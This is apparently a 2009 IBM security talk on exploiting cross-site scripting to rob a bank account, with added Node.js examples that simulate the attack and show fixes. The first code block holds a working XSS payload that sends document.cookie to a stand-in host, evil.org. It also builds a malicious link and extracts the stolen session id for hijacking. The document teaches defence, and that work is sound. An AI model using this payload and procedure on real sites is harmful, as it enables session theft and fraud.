© 2009 IBM Corporation
IBM Rational Application Security

The Bank Job: Utilizing XSS Vulnerabilities
Adi Sharabani, IBM Rational Application Security Research Group Manager
OWASP IL
ILSL - IBM Israel Software Lab

Agenda
Theoretical part:
- Same Origin Policy 101
- Cross-Site Scripting 101
- HTTP sessions
Practical part:
- Trivial robbery
- Advanced robbery
Browser Scripting Capabilities
What scripts can do:
- Perform user interactions with the site
- Interact seamlessly with the web site
- Perform any action that is related to the site
- Launch signed and safe ActiveX controls
Scripting Restrictions - Same Origin Policy
What scripts cannot do:
- Scripts can only interact with the origin (scheme, host and port) they came from
- Scripts can send requests to, and read the responses from, only their own origin
- Scripts can access other browser frames only if those frames come from the same origin
- Scripts can issue requests to other origins, but cannot read the corresponding responses
Cross Site Scripting - The Exploit Process
Actors: Evil.org, TheBank.site, the user.
1. A link to bank.com is sent to the user via e-mail or HTTP
2. The user sends the script to the bank, embedded as data
3. The script is returned by the bank and executed by the browser
4. The script sends the user's cookie and session information to Evil.org, without the user's consent or knowledge
5. Evil.org uses the stolen session information to impersonate the user
Trivial Robbery Demo
Demo steps:
1. Build the payload
2. Send the malicious link to the victim
3. Retrieve the cookie and extract the session id
4. Manually add the session cookie to the local browser
5. Make a transaction
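The whole trivial robbery, from the reflected script of the exploit-process slides to the session-id extraction of the demo steps, simulated offline in Node.js. This is an added example, not code from the original presentation or from IBM: the bank search page, the evil.org collector path, the cookie names and values are all constructed for illustration, and the vulnerable page is shown next to its HTML-encoding fix.

```javascript
// Added example, not code from the original presentation: the trivial-robbery
// flow simulated offline in Node.js. Hosts, paths, cookie names and values are
// constructed for illustration.

// --- TheBank.site: a page that reflects the "q" parameter into HTML ----------

// Vulnerable: the query is concatenated into the page without encoding, so a
// value containing markup comes back as markup and runs in the victim's browser.
function renderSearchPageVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Fixed: HTML-encode untrusted data before placing it in an HTML text context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderSearchPageSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// --- Evil.org: build payload, build link, extract the session id -------------

// Step 1, build the payload. It makes the victim's browser request an image
// from the attacker's collector with document.cookie in the query string. The
// Same Origin Policy lets the script issue that cross-origin request; it only
// stops the script from reading the response, which the attacker does not need.
function buildPayload(collectorUrl) {
  return `<script>new Image().src="${collectorUrl}?c="+encodeURIComponent(document.cookie)</script>`;
}

// Step 2, embed the payload in a link to the bank so the bank reflects it.
function buildMaliciousLink(bankSearchUrl, payload) {
  return `${bankSearchUrl}?q=${encodeURIComponent(payload)}`;
}

// Step 3, pull the session cookie out of the exfiltrated cookie string so it
// can be added to the attacker's own browser.
function extractSessionId(cookieString, sessionCookieName) {
  for (const part of cookieString.split(';')) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;
    if (part.slice(0, eq).trim() === sessionCookieName) return part.slice(eq + 1).trim();
  }
  return null;
}

// --- Simulated round trip ----------------------------------------------------
const collector = 'https://evil.org/c';             // hypothetical collector
const bankSearch = 'https://thebank.site/search';   // hypothetical bank page
const payload = buildPayload(collector);
const link = buildMaliciousLink(bankSearch, payload);

// The bank decodes the link's query parameter and reflects it.
const reflectedQuery = new URL(link).searchParams.get('q');
const vulnerablePage = renderSearchPageVulnerable(reflectedQuery); // script runs
const safePage = renderSearchPageSafe(reflectedQuery);             // inert text

// What the collector later receives. The cookie string is a constructed sample
// of what document.cookie returns for a victim whose cookies lack HttpOnly.
const victimCookies = 'JSESSIONID=7F2A9C0E1B; lang=en';
const collectorHit = `${collector}?c=${encodeURIComponent(victimCookies)}`;
const receivedCookies = new URL(collectorHit).searchParams.get('c');
const sessionId = extractSessionId(receivedCookies, 'JSESSIONID');

console.log('vulnerable page contains <script>:', vulnerablePage.includes('<script>'));
console.log('safe page contains <script>      :', safePage.includes('<script>'));
console.log('stolen session id                :', sessionId);
```

The payload uses an image request rather than an XMLHttpRequest because the cross-origin image load is exactly what the Same Origin Policy still permits: the attacker needs the request to leave the browser, not to read the reply. Step 4 of the demo is the attacker pasting the extracted value into their own browser's cookie jar, which is why the session id alone is enough unless the bank ties the session to something else.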
Advanced Robbery Demo
Problems: The session id cookie is not enough
- HttpOnly: a cookie flagged HttpOnly is still sent with every request, but the browser does not expose it to script through document.cookie, so the reflected script cannot read it
  Set-Cookie: <name>=<value> [; <name>=<value>] [; expires=<date>] [; domain=<domain_name>] [; path=<some_path>] [; secure] [; HttpOnly]
- Pre-logon XSS: if the script runs before the user has logged in, there is no session cookie to steal yet
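An added example, not part of the original presentation, that parses a Set-Cookie header in the format above, reports a session cookie that lacks HttpOnly or Secure, and shows which cookies document.cookie would hand to the reflected script. The cookie names and values and the list of common session-cookie names are assumptions made for the example.

```javascript
// Added example, not code from the original presentation: parse a Set-Cookie
// header in the format above and check the attributes that blunt the trivial
// robbery. Cookie names and values are constructed for illustration.

function parseSetCookie(header) {
  const body = header.replace(/^set-cookie:\s*/i, '');
  const parts = body.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: eq === -1 ? parts[0] : parts[0].slice(0, eq),
    value: eq === -1 ? '' : parts[0].slice(eq + 1),
    attributes: {},   // keys lower-cased: httponly, secure, path, domain, expires, max-age
  };
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return cookie;
}

// Cookie names that commonly carry the session id (assumed list, extend as needed).
const SESSION_COOKIE_NAMES = ['JSESSIONID', 'PHPSESSID', 'ASP.NET_SessionId', 'sessionid'];

// Returns the findings a reviewer would raise for a session cookie.
function auditSessionCookie(header) {
  const cookie = parseSetCookie(header);
  const findings = [];
  if (!SESSION_COOKIE_NAMES.includes(cookie.name)) return { cookie, findings };
  if (!cookie.attributes.httponly) {
    findings.push('missing HttpOnly: visible to document.cookie, so a reflected script can exfiltrate it');
  }
  if (!cookie.attributes.secure) {
    findings.push('missing Secure: also sent over plain HTTP');
  }
  if (cookie.attributes.expires || cookie.attributes['max-age']) {
    findings.push('persistent: the session id survives closing the browser');
  }
  return { cookie, findings };
}

// What document.cookie would return for these headers: the browser withholds
// HttpOnly cookies from script, so the trivial payload never sees them.
function visibleToScript(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.attributes.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed sample headers
const weakHeader = 'Set-Cookie: JSESSIONID=7F2A9C0E1B; path=/';
const hardenedHeader = 'Set-Cookie: JSESSIONID=7F2A9C0E1B; path=/; secure; HttpOnly';
const langHeader = 'Set-Cookie: lang=en; path=/';

console.log(auditSessionCookie(weakHeader).findings);       // two findings
console.log(auditSessionCookie(hardenedHeader).findings);   // []
console.log(visibleToScript([weakHeader, langHeader]));      // JSESSIONID=7F2A9C0E1B; lang=en
console.log(visibleToScript([hardenedHeader, langHeader]));  // lang=en
```

HttpOnly only removes the cookie from the script's reach; the script still runs inside the user's authenticated session and can drive the site directly, which is the point of the advanced robbery that follows.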
Problems: Key-logging is not enough
- Second factor authentication
  - Dongles
  - Client certificates
- Challenge on transaction
  - Security questions: What is your mom's maiden name?
  - Time-based challenge